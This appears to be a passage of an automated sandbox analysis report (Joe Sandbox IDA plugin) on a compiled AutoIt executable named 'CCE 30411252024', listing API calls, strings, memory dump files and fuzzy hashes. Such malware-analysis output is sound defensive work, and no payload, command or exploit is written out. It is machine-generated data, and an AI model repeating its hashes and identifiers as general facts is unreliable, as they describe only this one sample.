  • Part of subcall function 00EE3E6E: LoadIconW.USER32(000000A4), ref: 00EE3EB0
  • Part of subcall function 00EE3E6E: LoadIconW.USER32(000000A2), ref: 00EE3EC2
  • Part of subcall function 00EE3E6E: RegisterClassExW.USER32(?), ref: 00EE3F30
                                                                                          • Part of subcall function 00EE36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE36E6
                                                                                          • Part of subcall function 00EE36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3707
                                                                                          • Part of subcall function 00EE36B8: ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE371B
                                                                                          • Part of subcall function 00EE36B8: ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE3724
                                                                                          • Part of subcall function 00EE4FFC: _memset.LIBCMT ref: 00EE5022
                                                                                          • Part of subcall function 00EE4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE50CB
                                                                                        Strings
                                                                                        • runas, xrefs: 00F51D84
                                                                                        • This is a third-party compiled AutoIt script., xrefs: 00F51CC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                        • API String ID: 438480954-3287110873
                                                                                        • Opcode ID: c6185bbe7cbd4760648fd3ba3fe75bd83ccc902ea863146c665748bda687d8c5
                                                                                        • Instruction ID: 9a3540e3f9863e0771355bf3d3ddbd63e109349b48f8be90c907cf6c303b6146
                                                                                        • Instruction Fuzzy Hash: 8B512771E043CCAACF11ABB6DC46EED7BB9BF16744F005065F612731A2DA704609EB22

                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00EFDDEC
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00F7DC38,?,?), ref: 00EFDEAC
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,00F7DC38,?,?), ref: 00EFDF01
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EFDF0C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EFDF1F
                                                                                        • GetSystemInfo.KERNEL32(?,00F7DC38,?,?), ref: 00EFDF29
                                                                                        • GetSystemInfo.KERNEL32(?,00F7DC38,?,?), ref: 00EFDF35
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3851250370-0
                                                                                        • Opcode ID: 4bf5325195a9eac8a6bd06c18600772513619ba781592a2cff3efdce168eff53
                                                                                        • Instruction ID: 4ceb13ada371ffa6fcf8998a86ff332addec2a84b7959a8630242419d1c638f8
                                                                                        • Instruction Fuzzy Hash: 1761B2B2D0A388CFCF15CF6898C15E97FB56F2A300B1989D9D945AF207D624C909CB66

                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EE449E,?,?,00000000,00000001), ref: 00EE407B
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EE449E,?,?,00000000,00000001), ref: 00EE4092
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00EE449E,?,?,00000000,00000001,?,?,?,?,?,?,00EE41FB), ref: 00F54F1A
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00EE449E,?,?,00000000,00000001,?,?,?,?,?,?,00EE41FB), ref: 00F54F2F
                                                                                        • LockResource.KERNEL32(00EE449E,?,?,00EE449E,?,?,00000000,00000001,?,?,?,?,?,?,00EE41FB,00000000), ref: 00F54F42
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: fecdf640339b8cab91730b832e87e953c835676823302e8c528cc6e1a478cf66
                                                                                        • Instruction ID: 7957ed0b285bd99704ecbda98fa3a3145c3e6decf19833842b8c46a5511f480d
                                                                                        • Instruction Fuzzy Hash: 4B117CB0600749BFE7218B66EC48F677BB9EBC5B55F10416CF612962A0DBB1DC00AA21
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00F52F49), ref: 00F26CB9
                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00F26CCA
                                                                                        • FindClose.KERNEL32(00000000), ref: 00F26CDA
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 680579207d127cf7b257bc71e969e5fe71cc5d48520f68e08236d64d545ab4d3
                                                                                        • Instruction ID: b77594fcf737330be236a11b7fa53697272a61119adbb24ac590f3a21ad84284
                                                                                        • Instruction Fuzzy Hash: 18E0D831D104245792107738FC0D4E937ACDB0A33AF100705F471C21D0E7F0D90065D5
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3964851224-0
                                                                                        • Opcode ID: 79d132894facf0b726fd7dd1cb897ffaa741cebbbdda5a44cb5135c7b2dc9f29
                                                                                        • Instruction ID: 62857bc7b884a62da4031f390d5e9d78f5960aaefbea8781617a4e5f5b3f1811
                                                                                        • Instruction Fuzzy Hash: 7D929C70608345CFD724DF28C490B6AB7E1BF88308F14985DEA9A9B3A2D771ED45CB52
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EEE959
                                                                                        • timeGetTime.WINMM ref: 00EEEBFA
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EEED2E
                                                                                        • TranslateMessage.USER32(?), ref: 00EEED3F
                                                                                        • DispatchMessageW.USER32(?), ref: 00EEED4A
                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00EEED79
                                                                                        • DestroyWindow.USER32 ref: 00EEED85
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEED9F
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F55270
                                                                                        • TranslateMessage.USER32(?), ref: 00F559F7
                                                                                        • DispatchMessageW.USER32(?), ref: 00F55A05
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F55A19
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 2641332412-570651680
                                                                                        • Opcode ID: f8efd413b279cbb11d2b88b6ecea69706782fb96353525cfba3935c3e9272776
                                                                                        • Instruction ID: e4ccb7606845379196feda3308fdd905cbd2ed80983546b5021ecb489fe286ca
                                                                                        • Instruction Fuzzy Hash: FA620470604388CFDB20DF25C895BAA77E4BF44704F14187DFA4AAB292DBB5D848DB52
                                                                                        APIs
                                                                                        • ___createFile.LIBCMT ref: 00F15EC3
                                                                                        • ___createFile.LIBCMT ref: 00F15F04
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F15F2D
                                                                                        • __dosmaperr.LIBCMT ref: 00F15F34
                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00F15F47
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F15F6A
                                                                                        • __dosmaperr.LIBCMT ref: 00F15F73
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F15F7C
                                                                                        • __set_osfhnd.LIBCMT ref: 00F15FAC
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F16016
                                                                                        • __close_nolock.LIBCMT ref: 00F1603C
                                                                                        • __chsize_nolock.LIBCMT ref: 00F1606C
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F1607E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F16176
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F1618B
                                                                                        • __close_nolock.LIBCMT ref: 00F161EB
                                                                                          • Part of subcall function 00F0EA9C: CloseHandle.KERNELBASE(00000000,00F8EEF4,00000000,?,00F16041,00F8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F0EAEC
                                                                                          • Part of subcall function 00F0EA9C: GetLastError.KERNEL32(?,00F16041,00F8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F0EAF6
                                                                                          • Part of subcall function 00F0EA9C: __free_osfhnd.LIBCMT ref: 00F0EB03
                                                                                          • Part of subcall function 00F0EA9C: __dosmaperr.LIBCMT ref: 00F0EB25
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00F1620D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F16342
                                                                                        • ___createFile.LIBCMT ref: 00F16361
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F1636E
                                                                                        • __dosmaperr.LIBCMT ref: 00F16375
                                                                                        • __free_osfhnd.LIBCMT ref: 00F16395
                                                                                        • __invoke_watson.LIBCMT ref: 00F163C3
                                                                                        • __wsopen_helper.LIBCMT ref: 00F163DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                        • String ID: @
                                                                                        • API String ID: 3896587723-2766056989
                                                                                        • Opcode ID: e8d065f2e723d0934598a2f3f6c6ee3031a26d995f33bf134eb629183ac6f41c
                                                                                        • Instruction ID: 8f5e8640ff4de62e71ae314203368703c587ab53be657eaf184184773d38fe99
                                                                                        • Opcode Fuzzy Hash: e8d065f2e723d0934598a2f3f6c6ee3031a26d995f33bf134eb629183ac6f41c
                                                                                        • Instruction Fuzzy Hash: 87220271D0460A9BEF299E68DC45BFD7B61EB44324F284229E921DB2D1C7398DC0F791

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcscpy.LIBCMT ref: 00F2FA96
                                                                                        • _wcschr.LIBCMT ref: 00F2FAA4
                                                                                        • _wcscpy.LIBCMT ref: 00F2FABB
                                                                                        • _wcscat.LIBCMT ref: 00F2FACA
                                                                                        • _wcscat.LIBCMT ref: 00F2FAE8
                                                                                        • _wcscpy.LIBCMT ref: 00F2FB09
                                                                                        • __wsplitpath.LIBCMT ref: 00F2FBE6
                                                                                        • _wcscpy.LIBCMT ref: 00F2FC0B
                                                                                        • _wcscpy.LIBCMT ref: 00F2FC1D
                                                                                        • _wcscpy.LIBCMT ref: 00F2FC32
                                                                                        • _wcscat.LIBCMT ref: 00F2FC47
                                                                                        • _wcscat.LIBCMT ref: 00F2FC59
                                                                                        • _wcscat.LIBCMT ref: 00F2FC6E
                                                                                          • Part of subcall function 00F2BFA4: _wcscmp.LIBCMT ref: 00F2C03E
                                                                                          • Part of subcall function 00F2BFA4: __wsplitpath.LIBCMT ref: 00F2C083
                                                                                          • Part of subcall function 00F2BFA4: _wcscpy.LIBCMT ref: 00F2C096
                                                                                          • Part of subcall function 00F2BFA4: _wcscat.LIBCMT ref: 00F2C0A9
                                                                                          • Part of subcall function 00F2BFA4: __wsplitpath.LIBCMT ref: 00F2C0CE
                                                                                          • Part of subcall function 00F2BFA4: _wcscat.LIBCMT ref: 00F2C0E4
                                                                                          • Part of subcall function 00F2BFA4: _wcscat.LIBCMT ref: 00F2C0F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                        • API String ID: 2955681530-2806939583
                                                                                        • Opcode ID: f82366ed21f8070d3a0a540def0ddd9e013749e3f9a679c60683869660629b4b
                                                                                        • Instruction ID: baf4f4b0768b468a7fee5226658a94feb5f8d358c629f969b754c9ff9270dc1b
                                                                                        • Opcode Fuzzy Hash: f82366ed21f8070d3a0a540def0ddd9e013749e3f9a679c60683869660629b4b
                                                                                        • Instruction Fuzzy Hash: C691C072604345AFDB20EB50D851F9FB3E8BF94310F004829F95997292DB34FA48EB92

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00F2BDB4: __time64.LIBCMT ref: 00F2BDBE
                                                                                          • Part of subcall function 00EE4517: _fseek.LIBCMT ref: 00EE452F
                                                                                        • __wsplitpath.LIBCMT ref: 00F2C083
                                                                                          • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
                                                                                        • _wcscpy.LIBCMT ref: 00F2C096
                                                                                        • _wcscat.LIBCMT ref: 00F2C0A9
                                                                                        • __wsplitpath.LIBCMT ref: 00F2C0CE
                                                                                        • _wcscat.LIBCMT ref: 00F2C0E4
                                                                                        • _wcscat.LIBCMT ref: 00F2C0F7
                                                                                        • _wcscmp.LIBCMT ref: 00F2C03E
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C65D
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C670
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F2C2A1
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F2C338
                                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F2C34E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F2C35F
                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F2C371
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                        • String ID: p1#v`K$v
                                                                                        • API String ID: 2378138488-1068180069
                                                                                        • Opcode ID: a67d11e677d90c9716c646892f808c8a253336910ef9663ff533098b555c923b
                                                                                        • Instruction ID: b87084a4d23419fc4fec5f117dabfba17ff0c34527287f5ca9b01f1c9a2d62c6
                                                                                        • Opcode Fuzzy Hash: a67d11e677d90c9716c646892f808c8a253336910ef9663ff533098b555c923b
                                                                                        • Instruction Fuzzy Hash: D1C13CB1E00229ABDF11DF95DC81EDEB7BDAF48310F1040AAF609E6191DB749A449FA1

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EE3F86
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00EE3FB0
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE3FC1
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00EE3FDE
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE3FEE
                                                                                        • LoadIconW.USER32(000000A9), ref: 00EE4004
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE4013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: afe6643a0925959799f44caa46849802e47c732d5f39ebdcfde868f657948d3b
                                                                                        • Instruction ID: cea6760905f5f807eb74f28a377a98114b22285810a65322a8c7f2bcef32060e
                                                                                        • Opcode Fuzzy Hash: afe6643a0925959799f44caa46849802e47c732d5f39ebdcfde868f657948d3b
                                                                                        • Instruction Fuzzy Hash: A521B2B5E0021CAFDB409FA5E889B8DBBB4FB09700F05821AF625A62A0D7B54544AF91

                                                                                        Control-flow Graph

                                                                                         [Control-flow graph image omitted: basic blocks ee3742 through f51ea2, legend "Executed" / "Not Executed"]
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00EE37B3
                                                                                        • KillTimer.USER32(?,00000001), ref: 00EE37DD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE3800
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE380B
                                                                                        • CreatePopupMenu.USER32 ref: 00EE381F
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00EE382E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: aabad77274f421aca2575128acaf4f6f4b6daa998c47087622a9fb064f7989bd
                                                                                        • Instruction ID: c6c3ca5221e698429b00f8c9a4ab4290bbdd75fa71f3b62a7f3290adbb764d58
                                                                                        • Opcode Fuzzy Hash: aabad77274f421aca2575128acaf4f6f4b6daa998c47087622a9fb064f7989bd
                                                                                        • Instruction Fuzzy Hash: 834126F560419DABDB145F3ADC4EBBB3A95FB01301F052116FA12F31A1CB61AE40B761

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EE3E79
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00EE3E88
                                                                                        • LoadIconW.USER32(00000063), ref: 00EE3E9E
                                                                                        • LoadIconW.USER32(000000A4), ref: 00EE3EB0
                                                                                        • LoadIconW.USER32(000000A2), ref: 00EE3EC2
                                                                                          • Part of subcall function 00EE4024: LoadImageW.USER32(00EE0000,00000063,00000001,00000010,00000010,00000000), ref: 00EE4048
                                                                                        • RegisterClassExW.USER32(?), ref: 00EE3F30
                                                                                          • Part of subcall function 00EE3F53: GetSysColorBrush.USER32(0000000F), ref: 00EE3F86
                                                                                          • Part of subcall function 00EE3F53: RegisterClassExW.USER32(00000030), ref: 00EE3FB0
                                                                                          • Part of subcall function 00EE3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE3FC1
                                                                                          • Part of subcall function 00EE3F53: InitCommonControlsEx.COMCTL32(?), ref: 00EE3FDE
                                                                                          • Part of subcall function 00EE3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE3FEE
                                                                                          • Part of subcall function 00EE3F53: LoadIconW.USER32(000000A9), ref: 00EE4004
                                                                                          • Part of subcall function 00EE3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE4013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: 6a6f9fa243227a4e70b017983a474b48698d7062ecc35eb4713c93709bb9cd37
                                                                                        • Instruction ID: 56d5c0d24114172f8e32ef4224a479f440c17f13ac9222ed4cbdbf1605c8e1b7
                                                                                        • Opcode Fuzzy Hash: 6a6f9fa243227a4e70b017983a474b48698d7062ecc35eb4713c93709bb9cd37
                                                                                        • Instruction Fuzzy Hash: 762153F0E0431CABDB10DFA9EC49A99BBF5FB49310F00811AE215A32A0D7754540AF91

                                                                                        Control-flow Graph

                                                                                         [Control-flow graph image omitted: basic blocks 10582d8 through 10585da, legend "Executed" / "Not Executed"]
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010583A9
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010585CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                        • Instruction ID: 4001f3fdb4a629d02455fbefce47ec1ba43088aa35ae55fde0f78f4c00b38987
                                                                                        • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                        • Instruction Fuzzy Hash: 6AA11970E00209EBDB54CFA5C888BEEBBB5FF48305F208599E941BB281D7759A41CF55

Control-flow Graph

Control-flow graph (graph rendering omitted): function entry ee49fb; basic blocks call eebcce, RegOpenKeyExW, RegQueryValueExW (two sites), eff4ea, ee47b7, ee6a63, ee47e2 and RegCloseKey.
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EE4A1D
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F541DB
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F5421A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F54249
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                        • API String ID: 1586453840-614718249
                                                                                        • Opcode ID: 2ecd6f1ed74d7ed548217384453b16da43d0ba8c7ae2c8011971dda1c59b6685
                                                                                        • Instruction ID: b2d02a61ec9f8963cd6b68164ac6a8f6784498af1d78492605c77d4a33cf1145
                                                                                        • Opcode Fuzzy Hash: 2ecd6f1ed74d7ed548217384453b16da43d0ba8c7ae2c8011971dda1c59b6685
                                                                                        • Instruction Fuzzy Hash: B2116D71A0010CBEEB01ABA4CD86DBF7BBCEF04354F105069F516E2191EA70AE45EB50

Control-flow Graph

Control-flow graph (graph rendering omitted): single basic block at ee36b8-ee3728 calling CreateWindowExW twice and ShowWindow twice.
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE36E6
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3707
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE371B
